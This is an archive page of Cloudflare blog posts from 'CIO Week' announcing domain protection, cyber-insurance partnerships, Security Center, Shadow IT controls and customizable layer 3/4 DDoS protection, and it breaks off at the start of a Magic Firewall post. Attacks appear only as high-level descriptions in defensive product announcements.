Tag Archives: CIO Week

Introducing Cloudflare Domain Protection — Making Domain Compromise a Thing of the Past

Post Syndicated from Eric Brown original https://blog.cloudflare.com/introducing-domain-protection/

Introducing Cloudflare Domain Protection — Making Domain Compromise a Thing of the Past

Introducing Cloudflare Domain Protection — Making Domain Compromise a Thing of the Past

Everything on the web starts with a domain name. It is the foundation on which a company’s online presence is built. If that foundation is compromised, the damage can be immense.

As part of CIO Week, we looked at all the biggest risks that companies continue to face online, and how we could address them. The compromise of a domain name remains one of the greatest. There are many ways in which a domain may be hijacked or otherwise compromised, all the way up to the most serious: losing control of your domain name altogether.

You don’t want it to happen to you. Imagine not just losing your website, but all your company’s email, a myriad of systems tied to your corporate domain, and who knows what else. Having an attacker compromise your corporate domain is the stuff of nightmares for every CIO. And, if you’re a CIO and it’s not something you’re worrying about, know that we literally surveyed every other domain registrar and were so unsatisfied with their security practices we needed to launch our own.

But, now that we have, we want to make domain compromise something that should never, ever happen again. For that reason, we’re excited to announce that we are extending a new level of domain record protection to all our Enterprise customers. We call it Cloudflare Domain Protection, and we’re including it for free for every Cloudflare Enterprise customer. For those customers who have domains secured by Domain Protection, we will also waive all registration and renewal fees on those domains. Cloudflare Domain Protection will be available in Q1 — you can speak to your account manager now to take advantage of the offer.

It’s not possible to build a truly secure domain registrar solution without an understanding of how a domain gets compromised. Before we get into more details of our offering, we wanted to take you on a tour of how a domain can get compromised.

Stealing the Keys to Your Kingdom

There are three types of domain compromises that we often hear about. Let’s take a look at each of them.

Domain Transfers

One of the most serious compromises is an unauthorized transfer of the domain to another registrar. While cooperation amongst registrars has improved greatly over the years, it can still be very difficult to recover a stolen domain. It can often take weeks — or even months. It may require legal action. In a best case scenario, the domain may be recovered in a few days; in the worst case, you may never get it back.

The ability to easily transfer a domain between registrars is vitally important, and is part of what keeps the market for domain registration competitive. However, it also introduces potential risk. The transfer process used by most registries involves using a token to authorize the transfer. Prior to the widespread practice of redacting publicly accessible whois data, an email approval process was also used. To steal a domain, a malicious actor only needs to gain access to the authorization code and be able to remove any domain locks.

Unauthorized transfers start often with a compromised account. In many cases, the customer may have their account credentials compromised. In other cases, attackers use elaborate social engineering schemes to take control of the domain, often moving the domain between registrar accounts before transferring the domain to another registrar.

Name Server Updates

Name server updates are another way in which domains may be compromised. Whereas a domain transfer is typically an attempt to permanently take over a domain, a name server update is more temporary in nature. However, even if the update can usually be quickly reversed, these types of domain hijacks can be very damaging. They open the possibility of stolen customer data and intercepted email traffic. But most of all: they open an organization up to very serious reputational damage.

Domain Suspensions and Deletions

Most domain suspensions and deletions are not the result of malicious activity, but rather, they often happen through human error or system failures. In many cases, the customer forgets to renew a domain or neglects to update their payment method. In other cases, the registrar mistakenly suspends or deletes a domain.

Regardless of the reason though: the result is a domain that no longer resolves.

While these are certainly not the only ways in which domains may be compromised, they are some of the most damaging. We have spent a lot of time focused on these types of compromises and how to prevent them from happening.

A Different Approach to Domains

Like a lot of folks, we’ve long been frustrated by the state of the domain business. And so this isn’t our first rodeo here.

We already have a registrar service — Cloudflare Registrar — which is open to any Cloudflare customer. We make it super easy to get started, to integrate with Cloudflare, and there’s no markup on our pricing — we promise to never charge you anything more than the wholesale price each TLD charges. The aim: no more “bait and switch” and “endless upsell” (which, according to our customers, are the two most common terms associated with the domain industry). Instead, it’s a registrar that you love. Obviously, it’s Cloudflare, so we incorporated a number of security best practices into how it operates, too.

For our most demanding enterprise customers, we also have Custom Domain Protection. Every client using Custom Domain Protection defines their own process for updating records. As we said when we introduced it: “if a Custom Domain Protection client wants us to not change their domain records unless six different individuals call us, in order, from a set of predefined phone numbers, each reading multiple unique pass codes, and telling us their favorite ice cream flavor, on a Tuesday that is also a full moon, we will enforce that. Literally.

Yes, it’s secure, but it’s also not the most scalable solution. As a result, we charge a premium for it. As we spoke to our Enterprise customers, however, there was a need for something in between — a Goldilocks solution, so to speak, that offers a high level of protection without being quite so custom.

Enter Cloudflare Domain Protection.

A Triple-Locked Approach

Our approach to securing domains with Domain Protection is quite straightforward: identify the various attack vectors, and design a layered security mode to address each potential threat.

Before we take a look at each security layer, it’s important to understand the relationship between registrars and registries, and how that impacts domain security. You can think of registries as the wholesaler of domain names. They manage the central database of all registered domains within the Top-Level-Domain (TLD). They are also responsible for determining the wholesale pricing and establishing TLD specific policies.

Registrars, on the other hand, are the retailer of domains and are responsible for selling the domains to the end user. With each registration, transfer, or renewal, the registrar pays the registry a transaction fee.

Registrars and registries jointly manage domain registrations in what’s called the Shared Registration System (SRS). Registrars communicate with registries using an IETF standard called the Extensible Provisioning Protocol (EPP). Embodied in the EPP standard are a set of domain status that can be applied by registrars and registries to lock the domain and prevent updates, deletions, and transfers (to another registrar).

Registrars are able to apply “client” locks, frequently referred to as Registrar Locks. Registries apply “server” locks, also known as Registry Locks. It’s important to note that the registry locks always supersede the registrar locks. This means that the registrar locks cannot be removed until the registry locks have been removed.

Now, let’s take a closer look at our planned approach.

We start by applying the EPP Registrar Locks to the domain name. These are the EPP client locks that prevent domain updates, transfers, and deletions.

We then apply an internal lock that prevents any API calls to that domain from being processed. This lock functions outside of EPP and is designed to protect the domain should the EPP locks be removed, as well as situations where an operation may be executed outside of EPP. For example, in some TLDs the domain contact data is only stored at the registrar and never transmitted to the registry. In these cases, it’s important to have a non EPP locking mechanism.

After the registrar locks are applied, we will request the registry to apply the Registry Locks using a special non-EPP based procedure. It’s important to note that not all registries offer Registry Lock as a service. In some instances, we may not be able to apply this last locking feature.

Lastly, a secure verification procedure is created to handle any future requests to unlock or modify the domain.

Included Out of the Box

Our aim is to make Cloudflare Domain Protection the most scalable secure solution for domains that’s available. We want to ensure that the domains that matter most to our customers — the mission critical, high value domains — are securely protected.

Eligible domains that are explicitly included under a Cloudflare Enterprise contract may be included in our Domain Protection registration service at no additional cost. And, as we mentioned earlier, this will also cover registration and renewal fees — so not only will securing your domain be one less thing for you to worry about, so too will be paying for it.

Interested in applying Cloudflare Domain Protection to your domain names? Reach out to your account manager and let them know you’re interested. Additional details will be coming in early Q1, 2022.

Cloudflare announces partnerships with leading cyber insurers and incident response providers

Post Syndicated from Deeksha Lamba original https://blog.cloudflare.com/cyber-risk-partnerships/

Cloudflare announces partnerships with leading cyber insurers and incident response providers

Cloudflare announces partnerships with leading cyber insurers and incident response providers

We are excited to announce our cyber risk partnership program with leading cyber insurance carriers and incident response providers to help our customers reduce their cyber risk. Cloudflare customers can qualify for discounts on premiums or enhanced coverage with our partners. Additionally, our incident response partners are partnering with us for mitigating under attack scenarios in an accelerated manner.  

What is a business’ cyber risk?

Let’s start with security and insurance —  e.g., being a homeowner is an adventure and a responsibility. You personalize your home, maintain it, and make it secure against the slightest possibility of intrusion — fence it up, lock the doors, install a state of the art security system, and so on. These measures definitely reduce the probability of an intrusion, but you still buy insurance. Why? To cover for the rare possibility that something might go wrong — human errors, like leaving the garage door open, or unlikely events, like a fire, hurricane etc. And when something does go wrong, you call the experts (aka police) to investigate and respond to the situation.

Running a business that has any sort of online presence is evolving along the same lines. Getting the right security posture in place is absolutely necessary to protect your business, customers, and employees from nefarious cyber attacks. But as a responsible business owner/CFO/CISO, nevertheless you buy cyber insurance to protect your business from long-tail events that could allow malicious attackers into your environment, causing material damage to your business. And if such an event does take place, you engage with incident response companies for active investigation and mitigation.

In short, you do everything in your control to reduce your business’ cyber risk by having the right security, insurance, and active response measures in place.

The cyber insurance industry and the rise of ransomware attacks

Over the last two years, the rise of ransomware attacks has wreaked havoc on businesses and the cyber insurance industry. As per a Treasury Department report, nearly 600 million dollars in banking transactions were linked to possible ransomware payments in Suspicious Activity Reports (SARs) filed by financial services firms to the U.S. Government for the first six months of 2021, a jump of more than 40% over the total for all of 2020. Additionally, the Treasury Department investigators identified about 5.2 billion dollars in bitcoin transactions as potential ransomware payments, indicating that the actual amount of ransomware payments was much higher1.

The rise of these attacks has and should make businesses more cautious, making them more inclined to have the right cybersecurity posture in place  and to buy cyber insurance coverage.

Cloudflare announces partnerships with leading cyber insurers and incident response providers

Further, the rising frequency and severity of attacks, especially ransomware attacks, has led to increasing insurance claims and loss ratios (loss ratios refers to insurance claims i.e., how much insurance companies pay out in claims costs divided by total earned premiums i.e., how much customers pay them for insurance) for the cyber insurers. As per a recent research report, the most frequent types of losses covered by cyber insurers were ransomware (41%), funds transfer loss (27%), and business email compromise incidents (19%). These trends are pushing legacy insurance carriers to reevaluate how much coverage they can afford to offer and how much they have to charge clients to do so; thereby, triggering a structural change that can impact the ability of companies, especially the small and medium businesses, to minimize their cyber risk.

The end result has been a drastic increase in the premiums and denial rates over the last 12 months amongst some carriers, which has pushed customers to seek new coverage. The premiums have increased upwards of 50%, according to infosec experts and vendors, with some quotes jumping closer to 100%.2 Also, the lack of accessible cyber insurance and proper coverage disproportionately impacts the small and medium enterprises that find themselves as the common target for these cyber attacks. According to a recent research report, 70% of ransomware attacks are aimed at organizations with less than 1,000 employees.3 The increased automation of cyber attacks coupled with the use of insecure remote access tools during the pandemic has left these organizations exposed all while being faced with increased cyber insurance premiums or no access to coverage.

While some carriers are excluding ransomware payments from customers’ policies or are denying coverage to customers who don’t have the right security measures in place, there is a new breed of insurance carriers that are incentivizing customers in the form of broader coverage or lower prices for proactively implementing cybersecurity controls.

Cloudflare’s cyber risk partnerships

At Cloudflare, we have always believed in making the Internet a better place. We have been helping our customers focus on their core business while we take care of their cyber security. We are now going a step further, helping our customers reduce their cyber risk by partnering with leading cyber insurance underwriters and incident response providers.

Our objective is to help our customers reduce their cyber risk. We are doing so in partnership with several leading companies highlighted below. Our customers can qualify for enhanced coverage and discounted premiums for their cyber insurance policies by leveraging their security posture with Cloudflare.

Cloudflare announces partnerships with leading cyber insurers and incident response providers

Insurance companies: Powered by Cloudflare’s security suite, our customers have comprehensive protection against the most common and severe threat vectors. In most of the cases, when attackers see that a business is using Cloudflare they realize they will not be able to execute a denial of service (DoS) attack or infiltrate the customer’s network. Knowing the power of Cloudflare, the attackers prefer to spend their time on more vulnerable targets. This implies that our customers face a lower frequency and severity of attacks — an ideal customer set that could imply a lower loss ratio for underwriters. Our partners understand the security benefits of using Cloudflare’s security suite and are letting our customers qualify for lower premium rates and enhanced coverage.

Cloudflare customers can qualify for discounts/credits on premiums and enhanced coverage with our partners At-Bay, Coalition, and Cowbell Cyber.

“An insurance policy is an effective tool to articulate the impact of security choices on the financial risk of a company. By offering better pricing to companies who implement stronger controls, like Cloudflare’s Comprehensive DDoS Protection, we help customers understand how best to reduce risk. Incentivizing our customers to adopt innovative security solutions like Cloudflare, combined with At-Bay’s free active risk monitoring, has helped reduce ransomware in At-Bay’s portfolio 7x below the market average.”
Rotem Iram,
Co-founder and CEO, At-Bay

“It’s incredible what Cloudflare has done to create a safer Internet. When Cloudflare’s technology is paired with insurance, we are able to protect businesses in an entirely new way. We are excited to offer Cloudflare customers enhanced cyber insurance coverage alongside Coalition’s active security monitoring platform to help businesses build true cyber resilience with an always-on insurance policy.”
Joshua Motta, Co-founder & CEO, Coalition

“We are excited to work with Cloudflare to address our customers’ cybersecurity needs and help reduce their cyber risk. Collaborating with cybersecurity companies like Cloudflare will definitely enable a more data-driven underwriting approach that the industry needs”
Nate Walsh, Head of Strategic Partnerships, Corvus Insurance

“The complexity and frequency of cyber attacks continue to rise, and small and medium enterprises are increasingly becoming the center of these attacks. Through partners like Cloudflare, we want to encourage these businesses to adopt the best security standards and proactively address vulnerabilities, so they can benefit from savings on their cyber insurance policy premiums.”
Jack Kudale, Founder and CEO, Cowbell Cyber

Incident Response companies: Our incident response partners deal with active under attack situations day in, day out — helping customers mitigate the attack, and getting their web property and network back online. Many times, precious time is wasted in trying to figure out which security vendor to reach out to and how to get hold of the right team. We are announcing new relationships with prominent incident response providers CrowdStrike, Mandiant, and Secureworks to enable rapid referral of organizations under attack. As a refresher — my colleague, James Espinosa, wrote a great blog post on how Cloudflare helps customers against ransomware DDoS attacks.

“The speed in which a company is able to identify, investigate and remediate a threat heavily determines how it will fare in the end. Our partnership with Cloudflare provides companies the ability to take action rapidly and contain exposure at the time of an attack, enabling them to get back on their feet and return to business as usual as quickly as possible.”
Thomas Etheridge, Senior Vice President, CrowdStrike Services

“As cyber threats continue to rapidly evolve, the need for organizations to put response plans in place increases. Together, Mandiant and Cloudflare are enabling our mutual customers to mitigate the risk breaches pose to their business operations. We hope to see more of these much-needed technology collaborations that help organizations address the growing threat of ransomware and DDoS attacks in a timely manner.”
Marshall Heilman, EVP & Chief Technology Officer, Mandiant

“Secureworks’ proactive incident response and adversarial testing expertise combined with Cloudflare’s intelligent global platform enables our mutual customers to better mitigate the threats of sophisticated cyberattacks. This partnership is a much needed approach to addressing advanced cyber threats with speed and automation.”
Chris Bell, Vice President – Strategic Alliances, Secureworks

What’s next?

In summary, Cloudflare and its partners are coming together to ensure that our customers can run their business while getting adequate cybersecurity and risk coverage. However, we will not stop here. In the coming months, we’ll be working on creating programmatic ways to share threat intelligence with our cyber risk partners. Through our Security Center, we want to enable our customers, if they so choose, to safely share their security posture information with our partners for easier, transparent underwriting. Given the scale of our network and the magnitude and heterogeneity of attacks that we witness, we are in a strong position to provide our partners with insights around long-tail risks.

If you are interested in learning more, please refer to the partner links (At-Bay, Coalition, and Cowbell Cyber) or visit our cyber risk partnership page. If you’re interested in becoming a partner, please fill up this form.

….
Sources:
1https://www.wsj.com/articles/suspected-ransomware-payments-for-first-half-of-2021-total-590-million-11634308503
Gallagher, Cyber Insurance Market Update, Mid-year 2021
2https://www.ajg.com/us/news-and-insights/2021/aug/global-cyber-market-update/
3https://searchsecurity.techtarget.com/news/252507932/Cyber-insurance-premiums-costs-skyrocket-as-attacks-surge

Introducing Cloudflare Security Center

Post Syndicated from Malavika Balachandran Tadeusz original https://blog.cloudflare.com/security-center/

Introducing Cloudflare Security Center

Introducing Cloudflare Security Center

Today we are launching Cloudflare Security Center, which brings together our suite of security products, our security expertise, and unique Internet intelligence as a unified security intelligence solution.

Cloudflare was launched in 2009 to help build a better Internet and make Internet performance and security accessible to everyone. Over the last twelve years, we’ve disrupted the security industry and launched a broad range of products to address our customer’s pain points across Application Security, Network Security, and Enterprise Security.

While there are a plethora of solutions on the market to solve specific pain points, we’ve architected Cloudflare One as a unified platform to holistically address our customers’ most pressing security challenges.  As part of this vision, we are extremely excited to launch the public beta of Security Center. Our goal is to help customers understand their attack surface and quickly take action to reduce their risk of an incident.

Starting today, all Cloudflare users can use Security Center (available in your Cloudflare dashboard) to map their attack surface, review potential security risks and threats to their organizations, and mitigate these risks with a few clicks.

The changing corporate attack surface

A year ago, we announced Cloudflare One to address the complex nature of corporate networking today. The proliferation of public cloud, SaaS applications, mobile devices, and remote work has made the traditional model of the corporate network obsolete. The Internet is the new enterprise WAN, necessitating a novel approach to the way security teams manage their attack surface.

Second, the way we build applications has changed. Web applications today heavily use open source code and third-party scripts. Earlier this year we announced Page Shield, now GA, to help our customers track and monitor their third-party JavaScript dependencies.

These transformations in the IT landscape, coupled with the natural evolution that every organization goes through — such as growth, attrition, and M&A activity — create significant complexity for IT and security teams to stay on top of their organization’s ever-changing attack surface.

Introducing Cloudflare Security Center

The importance of attack surface management

An attack surface refers to the entire IT footprint of an organization that is susceptible to cyberattacks. Your attack surface consists of all the corporate servers, devices, SaaS, and cloud assets that are accessible from the Internet.

Over the last six months, something we’ve heard consistently from our customers is that they often don’t have a good grasp of their attack surface.

Because of the ease of creating new resources with the public cloud or SaaS, IT teams struggle to stay on top of shadow IT resources. Even when IT is aware of new infrastructure being spun up by dev teams, ensuring that these new resources are configured in line with corporate security standards is a constant battle.

It’s not only new resources that cause problems for IT teams — IT teams also want to quickly identify and decommission forgotten websites or applications that may have sensitive data or expose their organization to potential security risks.

These challenges are further complicated by the use of third-party software. Open source code, JavaScript libraries, SaaS applications, or self-hosted software introduce supply-chain risk into your attack surface. Security teams want to monitor potential vulnerabilities and malicious dependencies in third-party software.

Lastly, external threats add to your organization’s attack surface. Security teams want to quickly identify and take down rogue assets created by malicious actors. These rogue assets are often phishing sites or malware distribution points that attempt to trick the organization’s customers or employees into providing sensitive details or downloading a file.

The challenges of attack surface management

With such an expansive list of potential risks and threats to an organization, it’s no surprise that organizations of all sizes are struggling to keep up with their attack surface. Many of our customers have built in-house solutions or use a range of security products to ascertain and monitor their attack surface.

But we’ve consistently heard from our customers that these solutions just don’t work. They are often too noisy and produce far too many alerts, making it difficult for security teams to triage and prioritize issues. Customers are also tired of security vendor sprawl and don’t want to add yet another tool to integrate with their existing security solutions. Security teams have limited resources — across staff and budget — and they want a solution that creates less, not more, work.

Introducing Cloudflare Security Center

In order to make attack surface management accessible and actionable for all organizations, we are excited to launch Cloudflare Security Center. Security Center is a single place to map your attack surface, identify potential security risks, and mitigate risks with a few clicks.

Starting today, you’ll find “Security Center” in your Account Home page.

Introducing Cloudflare Security Center

Once you navigate to Security Center within the Cloudflare dashboard, you’ll find two new features:

  • Security Insights: Review and manage potential security risks and vulnerabilities associated with your IT infrastructure.
  • Infrastructure: Review and manage your IT infrastructure

In today’s release, if you navigate to Security Insights, you can view a log of potential security risks, vulnerabilities, and insecure configurations associated with your IT infrastructure on Cloudflare. Our security experts have helped curate our automated detections to help you quickly triage and address the most critical issues impacting your attack surface.

If this is your first time using Security Center, you will need to click Start scan to consent to Cloudflare scanning your infrastructure. Once you opt in to Security Center, we will scan your infrastructure on a regular schedule:

  • If you have any Pro or higher plan zones, or are using Teams Standard or higher, after opting in to Security Center, we will scan your infrastructure on a daily basis.
  • For all other Cloudflare plans, after opting in to Security Center, we will scan your infrastructure every three days.

After every scan, you can visit the Security Insights page to view a high level summary of your attack surface and dig into the specifics of any potential security risks we have identified.

Directly from Security Insights, you can resolve any insights by making the recommended changes to your Cloudflare configurations in just a few clicks.

With each scan, we inventory your IT assets on Cloudflare as part of the Infrastructure feature within Security Center. Here, you can view a summary of your domains on Cloudflare. At the top of the page, you can find a breakdown of your DNS records by Proxy Usage. Below this chart, you can review a list of all your domains on Cloudflare, as well as view other key details about your domains.

Introducing Cloudflare Security Center

What’s next

All features made available as part of today’s Security Center beta release are included in your existing Cloudflare plan. It’s our mission to help build a better Internet, and we believe that making attack surface management accessible and actionable is an important part of that mission. We want everyone, from an individual web developer to the CIO of a Fortune 100 company, to be able to easily secure their IT footprint.

You can get started today with Security Center’s beta release by visiting your Cloudflare dashboard. With just a few clicks, you can ensure that your Cloudflare settings are optimized for your organization’s security.

We’d love your feedback on Security Center. If you have any comments, questions or concerns, you can contact us directly at [email protected], or on our Cloudflare Community forum.

Stay tuned for further updates, as we continue to add more features to Security Center. Soon, you’ll be able to control not only your IT assets on Cloudflare, but your entire IT footprint. We’ll continue to build upon our risk detection capabilities, going beyond Application Security to Network Security, Enterprise Security, and Brand Security.

Shadow IT: make it easy for users to follow the rules

Post Syndicated from Kenny Johnson original https://blog.cloudflare.com/shadow-it/

Shadow IT: make it easy for users to follow the rules

Shadow IT: make it easy for users to follow the rules

SaaS application usage has exploded over the last decade. According to Gartner, global spending on SaaS in 2021 was $145bn and is forecasted to reach $171bn in 2022. A key benefit of SaaS applications is that they are easy to get started with and either free or low cost. This is great for both users and leaders — it’s easy to try out new tools with no commitment or procurement process. But this convenience also presents a challenge to CIOs and security teams. Many SaaS applications are great for a specific task, but lack required security controls or visibility. It can be easy for employees to start using SaaS applications for their everyday job without IT teams noticing — these “unapproved” applications are popularly referred to as Shadow IT.

CIOs often have no visibility over what applications their SaaS employees are using. Even when they do, they may not have an easy way to block users from using unapproved applications, or on the contrary, to provide easy access to approved ones.

Visibility into application usage

In an office, it was easier for CIOs and their teams to monitor application usage in their organization. Mechanisms existed to inspect outbound DNS and HTTP traffic over office Wi-Fi equipment and detect unapproved applications. In an office setting, IT teams could also notice colleagues using new SaaS applications or maybe hear them mention these new applications. When users moved to remote work due to COVID-19 and other factors, this was no longer possible, and network-driven logging became ineffective. With no central network, the focus of application monitoring needed to shift to user’s devices.

We’re excited to announce updates to Cloudflare for Teams that address Shadow IT challenges. Our Zero Trust platform provides a framework to identify new applications, block applications and provide a single location for approved applications. Cloudflare Gateway allows admins to monitor user traffic and detect new application usage. Our Shadow IT report then presents a list of new applications and allows for approval or rejection of each application.

Shadow IT: make it easy for users to follow the rules
Shadow IT: make it easy for users to follow the rules

This gives CIOs in-depth understanding of what applications are being used across their business, and enables them to come up with a plan to allow and block applications based on their approval status in the organization.

Blocking the right applications

Once the list of “shadow” applications is known, the next step is to block these applications with a meaningful error message to steer the user toward an approved application. The point should not be to make the user feel like they have done something wrong, but to encourage and provide them with the right application to leverage.

Shadow IT: make it easy for users to follow the rules

Cloudflare Gateway allows teams to configure policies to block unapproved applications and provide clear instructions to a user about what their alternatives are to that application. In Gateway, administrators can configure application-specific policies like “block all file sharing applications except Google Drive.” Tenant control can be utilized to restrict access to specific instances of a given application to prevent personal account usage of these tools.

Protect your approved applications

The next step is to protect the application you do want your users to use. In order to fully protect your SaaS applications, it is important to secure the initial authorization and maintain a clear audit trail of user activity. Cloudflare Access for SaaS allows administrators to protect the front door of their SaaS applications and verify user identity, multi-factor authentication, device posture and location before allowing access. Gateway then provides a clear audit trail of all user activity within the application to provide a clear picture in the case of a breach or other security events.

This allows CIOs and their teams to define which users may or may not access specific applications. Instead of creating broad access lists, they can define exactly which users need a specific tool to complete their job. This is beneficial for both security and licensing costs.

Show your users the applications they need

The final challenge is making it clear to users which applications they do and do not have access to. New employees often spend their first few weeks discovering new applications that would have helped them get up to speed more quickly.

We wanted to make it easy to provide a single place for users to access all of their approved applications. We added bookmarks and application visibility control to the Access application launcher to make this even easier.

Shadow IT: make it easy for users to follow the rules

Once all your applications are available through the application launcher, we log all user activity across these applications. And even better, many of these applications are hosted on Cloudflare which leads to performance improvements overall.

Getting started with the Access application launcher is easy and free for the first 50 users! Get started today from the Cloudflare for Teams dashboard.

How to customize your layer 3/4 DDoS protection settings

Post Syndicated from Omer Yoachimik original https://blog.cloudflare.com/l34-ddos-managed-rules/

How to customize your layer 3/4 DDoS protection settings

How to customize your layer 3/4 DDoS protection settings

After initially providing our customers control over the HTTP-layer DDoS protection settings earlier this year, we’re now excited to extend the control our customers have to the packet layer. Using these new controls, Cloudflare Enterprise customers using the Magic Transit and Spectrum services can now tune and tweak their L3/4 DDoS protection settings directly from the Cloudflare dashboard or via the Cloudflare API.

The new functionality provides customers control over two main DDoS rulesets:

  1. Network-layer DDoS Protection ruleset — This ruleset includes rules to detect and mitigate DDoS attacks on layer 3/4 of the OSI model such as UDP floods, SYN-ACK reflection attacks, SYN Floods, and DNS floods. This ruleset is available for Spectrum and Magic Transit customers on the Enterprise plan.
  2. Advanced TCP Protection ruleset — This ruleset includes rules to detect and mitigate sophisticated out-of-state TCP attacks such as spoofed ACK Floods, Randomized SYN Floods, and distributed SYN-ACK Reflection attacks. This ruleset is available for Magic Transit customers only.

To learn more, review our DDoS Managed Ruleset developer documentation. We’ve put together a few guides that we hope will be helpful for you:

  1. Onboarding & getting started with Cloudflare DDoS protection
  2. Handling false negatives
  3. Handling false positives
  4. Best practices when using VPNs, VoIP, and other third-party services
  5. How to simulate a DDoS attack

Cloudflare’s DDoS Protection

A Distributed Denial of Service (DDoS) attack is a type of cyberattack that aims to disrupt the victim’s Internet services. There are many types of DDoS attacks, and they can be generated by attackers at different layers of the Internet. One example is the HTTP flood. It aims to disrupt HTTP application servers such as those that power mobile apps and websites. Another example is the UDP flood. While this type of attack can be used to disrupt HTTP servers, it can also be used in an attempt to disrupt non-HTTP applications. These include TCP-based and UDP-based applications, networking services such as VoIP services, gaming servers, cryptocurrency, and more.

How to customize your layer 3/4 DDoS protection settings

To defend organizations against DDoS attacks, we built and operate software-defined systems that run autonomously. They automatically detect and mitigate DDoS attacks across our entire network. You can read more about our autonomous DDoS protection systems and how they work in our deep-dive technical blog post.

How to customize your layer 3/4 DDoS protection settings

Unmetered and unlimited DDoS Protection

The level of protection that we offer is unmetered and unlimited — It is not bounded by the size of the attack, the number of the attacks, or the duration of the attacks. This is especially important these days because as we’ve recently seen, attacks are getting larger and more frequent. Consequently, in Q3, network-layer attacks increased by 44% compared to the previous quarter. Furthermore, just recently, our systems automatically detected and mitigated a DDoS attack that peaked just below 2 Tbps — the largest we’ve seen to date.

How to customize your layer 3/4 DDoS protection settings
Mirai botnet launched an almost 2 Tbps DDoS attack

Read more about recent DDoS trends.

Managed Rulesets

You can think of our autonomous DDoS protection systems as groups (rulesets) of intelligent rules. There are rulesets of HTTP DDoS Protection rules, Network-layer DDoS Protection rules and Advanced TCP Protection rules. In this blog post, we will cover the latter two rulesets. We’ve already covered the former in the blog post How to customize your HTTP DDoS protection settings.

How to customize your layer 3/4 DDoS protection settings
Cloudflare L3/4 DDoS Managed Rules

In the Network-layer DDoS Protection rulesets, each rule has a unique set of conditional fingerprints, dynamic field masking, activation thresholds, and mitigation actions. These rules are managed (by Cloudflare), meaning that the specifics of each rule is curated in-house by our DDoS experts. Before deploying a new rule, it is first rigorously tested and optimized for mitigation accuracy and efficiency across our entire global network.

In the Advanced TCP Protection ruleset, we use a novel TCP state classification engine to identify the state of TCP flows. The engine powering this ruleset is flowtrackd — you can read more about it in our announcement blog post. One of the unique features of this system is that it is able to operate using only the ingress (inbound) packet flows. The system sees only the ingress traffic and is able to drop, challenge, or allow packets based on their legitimacy. For example, a flood of ACK packets that don’t correspond to open TCP connections will be dropped.

How attacks are detected and mitigated

Sampling

Initially, traffic is routed through the Internet via BGP Anycast to the nearest Cloudflare edge data center. Once the traffic reaches our data center, our DDoS systems sample it asynchronously allowing for out-of-path analysis of traffic without introducing latency penalties. The Advanced TCP Protection ruleset needs to view the entire packet flow and so it sits inline for Magic Transit customers only. It, too, does not introduce any latency penalties.

Analysis & mitigation

The analysis for the Advanced TCP Protection ruleset is straightforward and efficient. The system qualifies TCP flows and tracks their state. In this way, packets that don’t correspond to a legitimate connection and its state are dropped or challenged. The mitigation is activated only above certain thresholds that customers can define.

The analysis for the Network-layer DDoS Protection ruleset is done using data streaming algorithms. Packet samples are compared to the conditional fingerprints and multiple real-time signatures are created based on the dynamic masking. Each time another packet matches one of the signatures, a counter is increased. When the activation threshold is reached for a given signature, a mitigation rule is compiled and pushed inline. The mitigation rule includes the real-time signature and the mitigation action, e.g., drop.

How to customize your layer 3/4 DDoS protection settings

​​​​Example

As a simple example, one fingerprint could include the following fields: source IP, source port, destination IP, and the TCP sequence number. A packet flood attack with a fixed sequence number would match the fingerprint and the counter would increase for every packet match until the activation threshold is exceeded. Then a mitigation action would be applied.

However, in the case of a spoofed attack where the source IP addresses and ports are randomized, we would end up with multiple signatures for each combination of source IP and port. Assuming a sufficiently randomized/distributed attack, the activation thresholds would not be met and mitigation would not occur. For this reason, we use dynamic masking, i.e. ignoring fields that may not be a strong indicator of the signature. By masking (ignoring) the source IP and port, we would be able to match all the attack packets based on the unique TCP sequence number regardless of how randomized/distributed the attack is.

Configuring the DDoS Protection Settings

For now, we’ve only exposed a handful of the Network-layer DDoS protection rules that we’ve identified as the ones most prone to customizations. We will be exposing more and more rules on a regular basis. This shouldn’t affect any of your traffic.

How to customize your layer 3/4 DDoS protection settings
Overriding the sensitivity level and mitigation action

For the Network-layer DDoS Protection ruleset, for each of the available rules, you can override the sensitivity level (activation threshold), customize the mitigation action, and apply expression filters to exclude/include traffic from the DDoS protection system based on various packet fields. You can create multiple overrides to customize the protection for your network and your various applications.

How to customize your layer 3/4 DDoS protection settings
Configuring expression fields for the DDoS Managed Rules to match on

In the past, you’d have to go through our support channels to customize the rules. In some cases, this may have taken longer to resolve than desired. With today’s announcement, you can tailor and fine-tune the settings of our autonomous edge system by yourself to quickly improve the accuracy of the protection for your specific network needs.

For the Advanced TCP Protection ruleset, for now, we’ve only exposed the ability to enable or disable it as a whole in the dashboard. To enable or disable the ruleset per IP prefix, you must use the API. At this time, when initially onboarding to Cloudflare, the Cloudflare team must first create a policy for you. After onboarding, if you need to change the sensitivity thresholds, use Monitor mode, or add filter expressions you must contact Cloudflare Support. In upcoming releases, this too will be available via the dashboard and API without requiring help from our Support team.

How to customize your layer 3/4 DDoS protection settings

Pre-existing customizations

If you previously contacted Cloudflare Support to apply customizations, your customizations have been preserved, and you can visit the dashboard to view the settings of the Network-layer DDoS Protection ruleset and change them if you need. If you require any changes to your Advanced TCP Protection customizations, please reach out to Cloudflare Support.

If so far you didn’t have the need to customize this protection, there is no action required on your end. However, if you would like to view and customize your DDoS protection settings, follow this dashboard guide or review the API documentation to programmatically configure the DDoS protection settings.

Helping Build a Better Internet

At Cloudflare, everything we do is guided by our mission to help build a better Internet. The DDoS team’s vision is derived from this mission: our goal is to make the impact of DDoS attacks a thing of the past. Our first step was to build the autonomous systems that detect and mitigate attacks independently. Done. The second step was to expose the control plane over these systems to our customers (announced today). Done. The next step will be to fully automate the configuration with an auto-pilot feature — training the systems to learn your specific traffic patterns to automatically optimize your DDoS protection settings. You can expect many more improvements, automations, and new capabilities to keep your Internet properties safe, available, and performant.

Not using Cloudflare yet? Start now.

Magic Firewall gets Smarter

Post Syndicated from Achiel van der Mandele original https://blog.cloudflare.com/magic-firewall-gets-smarter/

Magic Firewall gets Smarter

Magic Firewall gets Smarter

Today, we’re very excited to announce a set of updates to Magic Firewall, adding security and visibility features that are key in modern cloud firewalls. To improve security, we’re adding threat intel integration and geo-blocking. For visibility, we’re adding packet captures at the edge, a way to see packets arrive at the edge in near real-time.

Magic Firewall is our network-level firewall which is delivered through Cloudflare to secure your enterprise. Magic Firewall covers your remote users, branch offices, data centers and cloud infrastructure. Best of all, it’s deeply integrated with Cloudflare, giving you a one-stop overview of everything that’s happening on your network.

A brief history of firewalls

